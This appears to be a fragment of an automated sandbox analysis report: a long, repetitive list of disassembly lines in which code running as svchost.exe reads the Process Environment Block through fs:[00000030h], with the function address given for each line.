Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]	1_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]	1_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]	1_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]	1_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]	1_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]	1_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]	1_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]	1_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]	1_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]	1_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]	1_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]	1_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]	1_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]	1_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]	1_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]	1_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]	1_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]	1_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]	1_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]	1_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]	1_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]	1_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]	1_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]	1_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]	1_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h]	1_2_030280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]	1_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]	1_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]	1_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]	1_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]	1_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]	1_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]	1_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]	1_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]	1_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]	1_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]	1_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]	1_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]	1_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]	1_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]	1_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]	1_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]	1_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]	1_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]	1_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]	1_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]	1_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]	1_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]	1_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]	1_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]	1_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]	1_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]	1_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]	1_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]	1_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]	1_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]	1_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]	1_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]	1_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]	1_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]	1_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]	1_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]	1_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]	1_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]	1_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]	1_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]	1_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]	1_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]	1_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]	1_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]	1_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]	1_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]	1_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]	1_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]	1_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]	1_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]	1_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]	1_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]	1_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]	1_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]	1_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]	1_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]	1_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]	1_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]	1_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]	1_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]	1_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]	1_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]	1_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]	1_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]	1_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]	1_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]	1_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]	1_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]	1_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]	1_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]	1_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]	1_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]	1_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]	1_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]	1_2_0305A470
